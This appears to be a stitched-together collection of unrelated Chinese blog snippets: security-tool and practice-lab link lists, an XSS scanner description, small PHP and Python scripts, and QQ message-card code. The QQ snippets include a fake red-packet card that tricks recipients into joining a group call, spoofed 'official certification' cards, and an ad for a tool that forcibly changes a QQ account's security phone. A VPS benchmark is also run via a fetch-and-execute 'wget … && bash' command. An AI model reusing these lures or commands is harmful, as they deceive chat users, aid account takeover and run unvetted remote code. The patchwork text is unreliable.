u2cTab.png | +--- 登上GitHub的trending截图纪念.png +--- Mrxn's Blog.url +--- plugins | +--- awesome-burp-extensions | | +--- README.md | +--- burp-vulners-scanner-1.2.jar | +--- burp-requests.jar | +--- bypasswaf.jar | +--- chunked-coding-converter.0.2.1.jar | +--- domain_hunter-v1.4.jar | +--- HackBar.jar | +--- http-request-smuggler-all.jar | +--- httpsmuggler.jar | +--- J2EEScan-2.0.0-beta-jar-with-dependencies.jar | +--- jsEncrypter.0.3 | | +--- jsEncrypter-0.3.jar | | +--- jsEncrypter_readme.pdf | | +--- nodejs_server.js | | +--- phantomjs_server.js | | +--- README.md | | +--- 对登录中账号密码进行加密之后再传输的爆破的思路和方式 - FreeBuf互联网安全新媒体平台.pdf | | +--- 编写加密传输爆破插件jsEncrypter _ 回忆飘如雪.pdf | +--- knife-v1.7.jar | +--- LFI scanner checks.jar | +--- LoggerPlusPlus.jar | +--- passive-scan-client-0.1-jar-with-dependencies.jar | +--- Readme.md | +--- reCAPTCHA-v0.9.jar | +--- sqlmap.jar | +--- sqlmap4burp++.0.2.jar | +--- WooyunSearch-1.0-SNAPSHOT-jar-with-dependencies.jar | +--- shiroPoc-0.5-SNAPSHOT-jar-with-dependencies.jar +--- README.md +--- 创建桌面快捷方式.bat +--- 创建桌面快捷方式.zip +--- 常见shell大小马密码.md +--- 渗透测试面试问题2019版.md 一些BURP的插件合集 https://github.com/Mr-xn/BurpSuite-collections ...

现如今，网络安全是近几年非常火热的一个行业，对于打算从事或入门网络安全不久的朋友来说，一直处于求学无门、无从下手的状态。为此小编将贝塔安全实验室成员分享的一些靶场环境、红队资源等个大家进行了总结，希望大家能好好利用，快速提升自己的技术水平！ 01 红队资源 1.红队资料集锦：https://www.lshack.cn/772/2.AD攻击防御：https://github.com/infosecn1nja/AD-Attack-Defense3.优秀红队资源：https://github.com/yeyintminthuhtut/Awesome-Red-Teaming4.零租资料库：https://wiki.0-sec.org/#/md5.Micro8高级攻防：https://github.com/Micropoor/Micro86.红队常用命令：https://github.com/foobarto/redteam-notebook 7.APT笔记：https://github.com/kbandla/APTnotes8.渗透测试笔记：https://github.com/Techlord-RCE/Penetration-Testing9.web渗透笔记：https://github.com/qazbnm456/awesome-web-security 01 蓝队资源 1.蓝队资源集锦：https://github.com/fabacab/awesome-cybersecurity-blueteam2.攻防思维导图：https://github.com/SecWiki/sec-chart3.AWS安全检测：https://github.com/stuhirst/awssecurity/blob/master/arsenal.md4.AWS安全工具：https://github.com/toniblyx/my-arsenal-of-aws-security-tools5.GitHub监控工具：https://github.com/0xbug/Hawkeye6. github信息监测：https://github.com/Hell0W0rld0/Github-Hunter7.服务器安全管理平台：https://github.com/chaitin/cloudwalker8.评估工具：https://github.com/guardicore/monkey9.企业安全管理平台：https://github.com/zhaoweiho/SecurityManageFramwork 01 开源漏洞库 1.乌云漏洞详情文章：https://wooyun.kieran.top2.同程安全公开漏洞：https://sec.ly.com/bugs 3.中国国家工控漏洞库：http://ics.cnvd.org.cn 4.美国国家工控漏洞库：https://ics-cert.us-cert.gov/advisories 5.绿盟漏洞库：http://www.nsfocus.net/index.php?act=sec_bug 6.威努特工控漏洞库：http://ivd.winicssec.com/ 7.CVE中文工控漏洞库：http://cve.scap.org.cn/view/ics 8.美国Offensive Security的漏洞库：https://www.exploit-db.com 9.美国国家信息安全漏洞库：https://nvd.nist.gov/vuln/search 01 练习靶场 1.124个Hacking技术的网站：https://www.blackmoreops.com/2018/11/06/124-legal-hacking-websites-to-practice-and-learn/2.vulnhub: https://www.vulnhub.com3.世界知名ctf交流网站: https://www.wechall.net4.谷歌XSS挑战：https://www.xssgame.com5.在线靶场挑战：https://www.hackthebox.eu6.vulstudy：https://github.com/c0ny1/vulstudy7.多种漏洞复现系统：https://github.com/bkimminich/juice-shop8.sql注入：https://github.com/Audi-1/sqli-labs9.红日靶场：http://vulnstack.qiyuanxuetang.net/vuln/ ...

<?php class Curl {     //微博热点监控     public function Get_url_wb($url, $header)     {         $wburl = "https://s.weibo.com/weibo?q=";         // 1. 初始化 curl         $ch = curl_init();         // 设置URL和相应的选项         curl_setopt($ch, CURLOPT_URL, $url);//设置目标url         curl_setopt($ch, CURLOPT_HEADER, false);         //设置header         curl_setopt($ch, CURLOPT_HTTPHEADER, $header);         curl_setopt($ch, CURLOPT_HEADER, 0);//返回response头部信息         //要求结果为字符串且输出到屏幕上         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);         //规避SSL验证         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);         //跳过HOST验证         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);         //运行curl         $data = curl_exec($ch);         curl_close($ch);         preg_match_all('/top" target="_blank">(.*?)<\/a>/U', $data, $Hot_search);//热搜名         preg_match_all('/<span>(.*?)<\/span>/U', $data, $Hotspot);//热度         preg_match_all('/href="\/weibo\?q=(.*?)Refer=top/U', $data, $Hoturl);//热度url         for ($i = 0; $i < count($Hoturl[1]); $i++) {             $Hoturl[1][$i] = $wburl . $Hoturl[1][$i];         }         $arr = ["Hot_search" => $Hot_search[1], "Hotspot" => $Hotspot[1], "Hoturl" => $Hoturl[1]];         return json_encode($arr, 448);     } } $a = new Curl(); $header = array(); echo $a->Get_url_wb("https://s.weibo.com/top/summary", $header); ...

算数异常类：ArithmeticExecption   空指针异常类型：NullPointerException   类型强制转换类型：ClassCastException   数组负下标异常：NegativeArrayException   数组下标越界异常：ArrayIndexOutOfBoundsException   违背安全原则异常：SecturityException   文件已结束异常：EOFException   文件未找到异常：FileNotFoundException   字符串转换为数字异常：NumberFormatException   操作数据库异常：SQLException   输入输出异常：IOException   方法未找到异常：NoSuchMethodException   下标越界异常：IndexOutOfBoundsExecption   系统异常：SystemException   创建一个大小为负数的数组错误异常：NegativeArraySizeException   数据格式异常：NumberFormatException   安全异常：SecurityException   不支持的操作异常：UnsupportedOperationException ...

一、漏洞利用、实战练习平台 1、WebGoat漏洞练习环境  https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy https://github.com/RandomStorm/DVWA 2、DoraBox,多拉盒 - 掌握常见漏洞攻防  https://github.com/gh0stkey/DoraBox 3、一个功能很全的CTF平台  https://github.com/zjlywjh001/PhrackCTF-Platform-Team 4、针对Pentest或者CTF的一个fuzz payload项目。  https://github.com/zer0yu/Berserker 5、Web安全实战：日安全-Web安全攻防小组关于Web安全的系列文章分享和HTB靶场  https://github.com/hongriSec/Web-Security-Attack 6、upload-labs很全的上传上传漏洞的靶场  https://github.com/c0ny1/upload-labs 7、跟踪真实漏洞相关靶场环境搭建  https://github.com/yaofeifly/Vub_ENV 8、数据库注入练习平台  https://github.com/Audi-1/sqli-labs 9、用node编写的漏洞练习平台，like OWASP Node Goat  https://github.com/cr0hn/vulnerable-node 10、基于https://www.exploit-db.com/的漏洞场景还原  https://github.com/havysec/vulnerable-scene 11、Ruby编写的一款工具，生成含漏洞的虚拟机  https://github.com/cliffe/secgen 12、metasploitable3  https://github.com/rapid7/metasploitable3/ 13、pentesterlab渗透测试在线练习  https://pentesterlab.com/exercises/ 14、轻量web漏洞演示平台  https://github.com/stamparm/DSVW 15、docker搭建的漏洞练习环境  https://github.com/MyKings/docker-vulnerability-environment 16、黑客技术训练环境  https://github.com/joe-shenouda/awesome-cyber-skills 17、web及app渗透训练平台  https://github.com/OWASP/SecurityShepherd 18、DevSecOps技能训练营  https://github.com/devsecops/bootcamp 19、injectify 生成一个便捷的高级中间人攻击Web站点  https://github.com/samdenty99/injectify 20、针对ctf线下赛流量抓取(php)、真实环境流量抓取分析的工具  https://github.com/wupco/weblogger 21、permeate:一个用于渗透透测试演练的WEB系统,用于提升寻找网站能力,也可以用于web安全教学  https://github.com/78778443/permeate 二、安全竞赛 （CTF夺标大赛） 1、Google2019CTF web 解题思路  https://xz.aliyun.com/t/5503 2、2018 第一届安洵杯 题目环境/源码  https://github.com/D0g3-Lab/AXB-CTF 3、google-ctf 包括2017和2018全部试题和答案  https://github.com/google/google-ctf/ 4、HCTF2017题目及解析  https://github.com/vidar-team/HCTF2017 5、CTF挑战平台  https://github.com/CTFTraining 6、灰帽子资源集,包括CTF、密码学、Linux攻击、USB攻击、漏洞等  https://github.com/bt3gl/Gray-Hacker-Resources 7、CTF和安全工具大合集  https://github.com/zardus/ctf-tools 8、近年CTF writeup大全  https://github.com/ctfs/write-ups-2016 9、HITB CTF 2017 Pwn题研究  http://0x48.pw/2017/08/29/0x49 10、脸谱CTF竞赛平台Demo  https://github.com/facebook/fbctf 11、CTF框架、类库、资源、软件和教程列表  https://github.com/apsdehal/awesome-ctf 12、CTF的题集  https://github.com/Hcamael/CTF_repo 13、CTF资源  https://github.com/ctfs/resources 14、CTF从入门到了解各种工具  https://github.com/SandySekharan/CTF-tool 15、p4团队的CTF解决方案  https://p4.team https://github.com/p4-team/ctf 16、ctftools 在线CTF信息网站，包括资源下载、在线工具、信息blog等  https://www.ctftools.com https://github.com/bollwarm/SecToolSet/blob/master/All.md ...

xssfork简介 xssfork作为sicklescan的一个功能模块，其开发主要目的是用于检测xss漏洞。 传统的xss探测工具，一般都是采用 payload in response的方式，即在发送一次带有payload的http请求后，通过检测响应包中payload的完整性来判断，这种方式缺陷，很多。 第一：不能准确地检测dom类xss 第二：用类似于requests之类的库不能真正的模拟浏览器 第三：网页js无法交互 怎么解决？如果能够用浏览器代替这个模块，去自动hook是最好的。所幸，我了解到phantomjs，当然现在google浏览器也支持headless模式，类似的，你也可以采用google浏览器去做检测。 原理 对于这类fuzz过程,基本都是预先准备好一些payload,然后加载执行。对于这类io型密集的扫描模型，后端使用多线程就比较适用，但是由于phantomjs你可以理解为一个无界面的浏览器，在加载的时候，其缺陷也比较明显，比较吃内存，用它来发包自然不像requests库轻量。 基本类型机用法： post类型  python xssfork.py -u “xx” -d “xx”  存储型 python xssfork.py -u “xx” -d “xxx” -D  “输出位置” 带cookie python xssfork.py -u “xx” -c “xx” ...

使用方法: wget vpstest.cn/it && bash it 或者: wget git.io/vpstest && bash vpstest 或者: wget -O it vpstest.cn && bash it 整合了 1. bench.sh 2. LemonBench 3. superspeed 4. superbench修复版 5. 91yuntest 6. ZBench 7. superbench修复+多节点版 8. UnixBench 9. GeekBench5 10.kos回程测试 11.超内存测试 12.路由测试 （注：脚本收集自互联网） 已修复kos测试 已更新删除残留文件 修复了一些已知bug...

效果图： 代码： {"app":"com.tencent.mobileqq.reading","desc":"","view":"singleImg","ver":"1.0.0.70","prompt":"[高清福利图] ","appID":"","sourceName":"","actionData":"","actionData_A":"","sourceUrl":"","meta":{"singleImg":{"mainImage":"https:\/\/oss.nmsl.mobi\/Team\/Xml\/4\/0.jpg","mainUrl":"https:\/\/cdn.vip.qq.com\/club\/client\/read\/common\/transfer.html?url=此处加url编码后的群链接"}},"config":{"forward":0,"showSender":1},"text":"","extraApps":[],"sourceAd":""} url编码地址：http://tool.chinaz.com/tools/urlencode.aspx...

教程演示 教程简介 一般会有些无聊的用户无意义的频繁刷新或者cc攻击请求都会给服务器加重很多负担 其实 用cookie就可以防止这一点 如果频繁刷新或者cc攻击都会跳转到你设置的那个网址的 例如设置存活5/s 一次 每5秒只可以请求一次 也就是只能刷新一次 如果超过了两次 那么会直接跳转到你设置的网址 代码可以加到你需要防止的文件 疑难问题评论即可 代码如下 <?php error_reporting(0); //if($_COOKIE["ck"])die("刷新过快！"); if($_COOKIE["ck"])header("Location:http://www.dufengvip.cn");//这里如果用户刷新过快，给予终止php脚本或者直接302跳转 setcookie("ck","1",time()+5);//设定cookie存活时间5s echo "hello!"; ?>...

软件介绍 QQ密保手机没用了想改密保可以试试这，不是百分百可以成功。必须是长期登录本手机的QQ才可以大几率成功！ 软件截图 加群下载QQ群号：979727860 点击链接加入群聊：https://jq.qq.com/?_wv=1027&k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="安卓一键强制改QQ密保手机" alt="安卓一键强制改QQ密保手机" border="0" width="750px" height="1344px" /> ...

本文是如何实现QQ假红包强制进群类型二 暂未和谐 最新代码 {"app":"com.tencent.mobileqq.reading","desc":"","view":"singleImg","ver":"1.0.0.70","prompt":"[QQ红包]恭喜发财","appID":"","sourceName":"","actionData":"","actionData_A":"","sourceUrl":"","meta":{"singleImg":{"mainImage":"http:\/\/url.cn\/N0VMmw0U","mainUrl":"mqqapi:\/\/forward\/url?url_prefix=这里填写加密后的群通话链接"}},"config":{"forward":1,"showSender":1},"text":"","extraApps":[],"sourceAd":"","extra":""} 1.群聊打开语音通话，随便选几个群好友打电话，然后右上角点击邀请好友 再右上角 分享通话获取QQ群通话链接 （记得用24小时免验证的链接，不然不会强制加群）  2.把复制的通话链接用base64加密，点下面这个网址去进行加密https://base64.us/ 效果图 ...

加群获取更多代码QQ群号：979727860 点击链接加入群聊：https://jq.qq.com/?_wv=1027&k=FDmmUxxL CEKNoNimQH-f1Ra94?imageView/2/w/800" title="QQxml卡片代码合集" alt="QQxml卡片代码合集" border="0" width="750px" height="1344px" /> 新清明上河图QQxml卡片代码 <?xml version='1.0' encoding='UTF-8' standalone='yes' ?> <msg serviceID="60" templateID="14" action="web" brief="进来学习中国古代美术！" sourcePublicUin="3043786528" sourceMsgId="1495460701626432" url="https://www.itql.cn" flag="3" adverSign="0" multiMsgFlag="0"> <item layout="1" advertiser_id="0" aid="0"> <vote cover="http://gchat.qpic.cn/gchatpic_new/1169088181/4177879595-3121117498-74EB28C523F12CE933EEF3BCF50D4ED1/0" /></item> <item layout="0" advertiser_id="0" aid="0"><hr hidden="false" style="0" /> </item><source name="" icon="" action="" appid="-1" /></msg> 群公告xml代码 {"app":"com.tencent.mannounce","desc":"群公告","view":"main","ver":"1.0.0.43","prompt":"[群公告]虽然我不是管理员，但是我也要发个公告装个B","appID":"","sourceName":"","actionData":"","actionData_A":"","sourceUrl":"","meta":{"mannounce":{"cr":1,"encode":1,"fid":"37f8880e000000008a56855eb9320800","gc":"243857463","sign":"c8d40b5e57ae5a7d6865ff0b98bf5b73","text":"6Jm954S25oiR5LiN5piv566h55CG5ZGY77yM5L2G5piv5oiR5Lmf6KaB5Y+R5Liq5YWs5ZGK6KOF5LiqQvCfjYo=","title":"576k5YWs5ZGK","uin":"2662494588"}},"config":{"ctime":1585796746,"forward":0,"token":"911493d7a80fd62b71aa91e4b1fa383c"},"text":"","extraApps":[],"sourceAd":""} 回执消息xml代码 <?xml version='1.0' encoding='UTF-8' standalone='yes' ?><msg serviceID="107" templateID="1" action="viewReceiptMessage" brief="[回执消息]" m_resid="x0DwAEdLtzd2WJ15N2KHqOgjsp6eHn9TKKypawugshhvbhAju3TdnXtbrK7gDjhI" m_fileName="6688764403224599306" sourceMsgId="0" url="" flag="3" adverSign="0" multiMsgFlag="0"><item layout="29" advertiser_id="0" aid="0"><type>1</type></item><source name="" icon="" action="" appid="-1" /></msg> 超大图xml代码 <?xml version='1.0' encoding='UTF-8' standalone='yes' ?><msg serviceID="5" templateID="1" action="" brief="严肃" sourceMsgId="0" url="" flag="2" adverSign="0" multiMsgFlag="0"><item layout="0"><image uuid="2BFB0CD37435F8F52659435EFB9A8396.png" md5="2BFB0CD37435F8F52659435EFB9A8396" GroupFiledid="0" filesize="38504" local_path="/storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/MobileQQ/chatpic/chatimg/832/Cache_-18f6a103c6617832" minWidth="400" minHeight="400" maxWidth="500" maxHeight="1000" /></item><source name="" icon="" action="" appid="-1" /></msg> 百元大钞xml代码 {"app":"com.tencent.mobileqq.reading","desc":"","view":"singleImg","ver":"1.0.0.70","prompt":"百元大钞","appID":"","sourceName":"","actionData":"","actionData_A":"","sourceUrl":"","meta":{"singleImg":{"mainImage":"https:\/\/gchat.qpic.cn\/gchatpic_new\/3020005669\/916530575-2949639428-6E45D21EADE33511C565E25AB432AB59\/0?term=2","mainUrl":""}},"text":"","extraApps":[],"sourceAd":""} 百元大钞的图片支持图床地址，可百度在线图床上传图片替换mainImages里面的地址即可 推荐QQ显示官方认证xml代码 <?xml version='1.0' encoding='UTF-8' standalone='yes' ?><msg serviceID="1" templateID="1" action="plugin" actionData="AppCmd://OpenContactInfo/?uin=QQ号" a_actionData="mqqapi://card/show_pslcard?src_type=internal&amp;source=sharecard&amp;version=1&amp;uin=QQ号" i_actionData="mqqapi://card/show_pslcard?src_type=internal&amp;source=sharecard&amp;version=1&amp;uin=QQ号" brief="快来看" sourceMsgId="0" url="" flag="2" adverSign="0" multiMsgFlag="0"><item layout="0" mode="1"><summary> 腾讯官方特别推荐</summary><hr hidden="false" style="0" /></item><item layout="2" mode="2"><picture cover="mqqapi://card/show_pslcard?src_type=internal&amp;source=sharecard&amp;version=1&amp;uin=QQ号" w="0" h="0" /><title color="#FF4900">⁣腾讯推荐国民男神</title><summary color="#6495ed">昵称:趣乐分享</summary></item><source name="官方认证" icon="https://qzs.qq.com/ac/qzone_v5/client/auth_icon.png?_tcvassp_0_=640shp" action="web" appid="-1" /></msg> 把QQ号替换成自己的即可 QQ假红包   {"app":"com.tencent.mobileqq.reading","desc":"","view":"singleImg","ver":"1.0.0.70","prompt":"[QQ红包]恭喜发财","appID":"","sourceName":"","actionData":"","actionData_A":"","sourceUrl":"","meta":{"singleImg":{"mainImage":"http:\/\/url.cn\/N0VMmw0U","mainUrl":"mqqapi:\/\/forward\/url?url_prefix=这里填写加密后的群通话链接"}},"config":{"forward":1,"showSender":1},"text":"","extraApps":[],"sourceAd":"","extra":""} ...

1. 前言 邮件，作为最正式规范的沟通方式，在日常办公过程中经常被用到 我们都知道 Python内置了对 SMTP 的支持，可以发送纯文本、富文本、HTML 等格式的邮件 本文将聊聊利用 Python 发送邮件的 3 种方式 2. 准备 以 126 邮箱为例，在编码之前，我们需要开启 SMTP 服务 然后，手动新增一个授权码 其中，账号、授权码和服务器地址用于连接登录邮箱服务器 3. 方式一：smtplib smtplib是 Python 自带的依赖库，可以直接导入使用首先，通过邮箱账号、授权码、邮箱服务器地址初始化一个 SMTP 实例，然后进行连接 def __init__(self):     # 初始化     self.smtp = smtplib.SMTP()     # 连接邮箱服务器地址     self.smtp.connect('smtp.126.com')     # 加入主题和附件，邮件体     self.email_body = MIMEMultipart('mixed')     # 发件人地址及授权码     self.email_from_username = '**@126.com'     self.email_from_password = '授权码' # 登录 self.smtp.login(self.email_from_username, self.email_from_password) 然后，将收件人列表、邮件标题、邮件正文内容、附件路径及附件文件名加入到上面定义的邮件体中 def generate_email_body(self, email_to_list, email_title, email_content, attchment_path, files):     """     组成邮件体     :param email_to_list:收件人列表     :param email_title:邮件标题     :param email_content:邮件正文内容     :param attchment_path:附件的路径     :param files:附件文件名列表     :return:     """     self.email_body['Subject'] = email_title     self.email_body['From'] = self.email_from_username     self.email_body['To'] = ",".join(email_to_list)     for file in files:         file_path = attchment_path + '/' + file         if os.path.isfile(file_path):             # 构建一个附件对象             att = MIMEText(open(file_path, 'rb').read(), 'base64', 'utf-8')             att["Content-Type"] = 'application/octet-stream'             att.add_header("Content-Disposition", "attachment", filename=("gbk", "", file))             self.email_body.attach(att)     text_plain = MIMEText(email_content, 'plain', 'utf-8')     self.email_body.attach(text_plain) 接着，就可以使用 SMTP 实例对象，将邮件发送出去  # 收件人列表 email_to_list = ['收件人1地址','收件人2地址'] # 发送邮件 # 注意：此处必须同时指定发件人与收件人，否则会当作垃圾邮件处理掉 self.smtp.sendmail(self.email_from_username, email_to_list, self.email_body.as_string()) 邮件发送完毕之后，退出服务即可 def exit(self):     """     退出服务     :return:     """     self.smtp.quit() 4. 方式二：zmail Zmail 项目创建目的是，使邮件处理变得更简单 使用 Zmail 发送接收邮件方便快捷，不需要手动添加服务器地址、端口以及适合的协议，可以轻松创建 MIME 对象和头文件 注意：Zmail 仅支持 Python3，不支持 Python2 首先，安装依赖库 # 安装依赖库 pip3 install zmail 然后，使用邮箱账号、授权码创建一个邮箱服务对象 class ZMailObject(object):     def __init__(self):         # 邮箱账号         self.username = '**@126.com'         # 邮箱授权码         self.authorization_code = '授权码'         # 构建一个邮箱服务对象         self.server = zmail.server(self.username, self.authorization_code) 接着，将邮件主题、邮件内容、包含的附件路径加入到一个字典中，组成邮件主体 # 邮件主体 mail_body = {         'subject': '测试报告',         'content_text': '这是一个测试报告',  # 纯文本或者HTML内容         'attachments': ['./attachments/report.png'], } 最后，将调用send_mail()函数，将邮件发送出去即可 # 收件人 # 可以指定一个人，字符串；也可以是多个人，列表 mail_to = "收件人1" # 发送邮件 self.server.send_mail(mail_to, mail_body) 5. 方式三：yagmail yagmail 只需要几行代码，就能实现发送邮件的功能 相比 zmail，yagmail 实现发送邮件的方式更加简洁优雅 首先，安装依赖库 # 安装依赖库 pip3 install yagmail 然后，通过账号、授权码和服务器地址连接邮箱服务器，返回一个服务对象 import yagmail # 连接服务器 # 用户名、授权码、服务器地址 yag_server = yagmail.SMTP(user='**@126.com', password='授权码', host='smtp.126.com') 接着，通过 send() 函数，将邮件发送出去 # 发送对象列表 email_to = ['**@qq.com', ] email_title = '测试报告' email_content = "这是测试报告的具体内容" # 附件列表 email_attachments = ['./attachments/report.png', ] # 发送邮件 yag_server.send(email_to, email_title, email_content, email_attachments) 邮件发送完毕之后，关闭连接即可 # 关闭连接 yag_server.close() 6. 最后 上面总结了 Python 发送邮件的 3 种方式，实际项目中，更推荐使用后两种方式 我已经将文中全部源码上传到后台，关注公众号后回复「 email 」即可获得全部源码 如果你觉得文章还不错，请大家可以 加入我们的交流群，因为这将是我持续输出更多优质文章的最强动力！ ...

<?xml version='1.0' encoding='UTF-8' standalone='yes' ?> <msg serviceID="60" templateID="14" action="web" brief="进来学习中国古代美术！" sourcePublicUin="3043786528" sourceMsgId="1495460701626432" url="http://www.dufengvip.cn" flag="3" adverSign="0" multiMsgFlag="0"> <item layout="1" advertiser_id="0" aid="0"> <vote cover="http://gchat.qpic.cn/gchatpic_new/1169088181/4177879595-3121117498-74EB28C523F12CE933EEF3BCF50D4ED1/0" /></item> <item layout="0" advertiser_id="0" aid="0"><hr hidden="false" style="0" /> </item><source name="" icon="" action="" appid="-1" /></msg> ...

本人只是python初学者，本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)！在日常渗透测试过程中我们都知道，在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利，所以信息收集格外重要。而信息收集往往费时间比较多，所以我们想写一个自动信息收集的脚本，但是代码量太大。本文就先从whois信息开始，代码不好的地方。希望大家提出意见！ 本次模块配合之前的用python编写自动信息收集脚本一，二使用 import threading #多线程 import requests import time from lxml import etree import re #正则表达式 import csv import telnetlib #建立tcp链接 实现端口扫描 class xxsj(object):     def __init__(self):         global dk #创建全局变量，后面端口扫描用         self.wz = input("请输入您想查询的网站") #接收网站地址         dk = self.wz         self.a = re.sub(r"www.","",self.wz) #正则表达式，匹配www. 然后删除         self.header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'}     def ip(self):         url='https://dns.aizhan.com/' self.wz '/' # url地址         print("----在获取ip地址----")         response = requests.get(url=url, headers=self.header)         selector = etree.HTML(response.content)         title = "IP地址"         global ab #创建全局 ...

本人只是python初学者，本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)！在日常渗透测试过程中我们都知道，在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利，所以信息收集格外重要。而信息收集往往费时间比较多，所以我们想写一个自动信息收集的脚本，但是代码量太大。本文就先从whois信息开始，代码不好的地方。希望大家提出意见！ 本次模块配合之前的用python编写自动信息收集脚本(一)使用 def xx(self):     url = 'https://www.aizhan.com/seo/' self.wz     response = requests.get(url=url, headers=self.header)     selector = etree.HTML(response.content)     title = selector.xpath('//*[@id="icp"]/li[1]/text()')[0]   #备案号 获取li[1]下的文本     infor = selector.xpath('//*[@id="icp_icp"]/text()')[0]   #备案信息     a = selector.xpath('//*[@id="icp_company"]/text()')[0]   #公司性质     b = selector.xpath('//*[@id="icp_type"]/text()')[0]    #公司名称     c = 1     for i in range(0, 2):     #写两次  将四个变量两次写人csv文件中         if c == 1:             self.write([title, infor])             c = c 1         else:             self.write([b, a]) ...

本人只是python初学者，本文只适合初学者观看学习。大佬请绕过(或者指出需要改进的地方)！ 在日常渗透测试过程中我们都知道，在对目标进行渗透之前都是先要信息收集一波。收集到越多的信息往往渗透过程中越顺利，所以信息收集格外重要。而信息收集往往费时间比较多，所以我们想写一个自动信息收集的脚本，但是代码量太大。本文就先从whois信息开始，代码不好的地方。希望大家提出意见！ import requests from lxml import etree import csv class xxsj(object):     def __init__(self):         self.header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'}     def whois(self):         wz = input('请输入您想信息收集的网站:')         print("正在whois查询",)         url = 'https://whois.aizhan.com/' wz         response = requests.get(url=url, headers=self.header)         selector = etree.HTML(response.content)         title = selector.xpath('//td[@class="thead"]/text()')         yuming = selector.xpath('//td[2]//text()')         a = len(title)         for i in range(0, a - 1):             title1 = title             yuming1 = yuming             self.write([title1, yuming1])     def write(self,lis):         with open('信息收集.csv', ...